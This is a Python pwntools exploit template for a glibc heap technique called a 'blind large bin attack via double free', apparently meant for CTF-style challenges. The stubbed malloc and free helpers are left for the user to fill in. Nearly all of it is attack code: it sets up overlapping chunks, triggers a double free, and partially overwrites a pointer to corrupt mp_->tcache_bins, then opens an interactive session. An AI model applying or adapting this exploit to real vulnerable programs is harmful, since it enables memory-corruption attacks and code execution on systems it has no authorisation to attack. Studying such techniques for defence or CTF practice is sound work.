from pwn import *
# Blind Large bin Attack via Double Free
# see https://hazyclimb.dev/posts/blind-large-bin-attack/

# If you want to use this, define these
def start():
    pass

def malloc(size, data):
    pass

def free(idx):
    pass

p = start()

def malloci(size, data=b'idc'):
    return malloc(size-0x8, data)

# = For large bin attack
# p1_size needs to be large enough such that early_p1_size doesn't go into tcache
p1_size = 0x4d0
# p2_size needs to be smaller than p1_size but in the same large bin
p2_size = 0x4c0
# this chunk will be used to move p1 and p2 from unsorted to their large bin
sorter_size = p1_size + 0x10

# = For the overlap creating a libc address in p1->bk_nextsize
prev_size = 0x90   # needs to be larger than fastbin size
next_size = 0xa0   # needs to be larger than prev_size
early_p1_size = p1_size - next_size

# Fill the tcache so we can play around with prev
tcache = []
for i in range(7):
    tcache.append(malloci(prev_size, b'tcache'))

prev = malloci(prev_size, b'prev')
p1 = malloci(early_p1_size, b'p1')
next = malloci(next_size, b'next')
malloci(0x20, b'barrier')
p2 = malloci(p2_size, b'p2')
malloci(0x20, b'barrier')

for t in tcache:
    free(t)

# Setup overlapping chunks
free(prev)
free(p1)
malloci(prev_size + early_p1_size, flat(
        b'A' * (prev_size - 8),
        p1_size | 1,
    ))

# Overwrite the "next" chunk's size so when we split
# prev, it doesn't try to consolidate forward
free(p1) # VULN: Double Free
malloci(p1_size, flat(
        b'B' * (early_p1_size - 0x10),
        (prev_size + early_p1_size),
        (next_size + 0x20) | 1 # 0x20 = barrier
    ))

# Put p1 into the large bin
free(p1)
malloci(sorter_size, b'sorter')

# Add the overlapping chunk to unsorted bin and split it
free(prev)
malloci(prev_size + 0x10, b'split!')

# Allocate the split remainder and do a partial overwrite to &mp_->tcache_bins
malloci(early_p1_size - 0x10, flat(
        b'C' * 8,
        b'\xA8\x13' # last two bytes of (&mp_->tcache_bins - 0x20)
    ))

# Put p2 into large bin, causing the large bin attack!
free(p2)
malloci(sorter_size, b'sorter2')

# Thus we get:
# pwndbg> p/x mp_->tcache_bins
# $1 = 0x55555555bc00

p.interactive()
p.close()

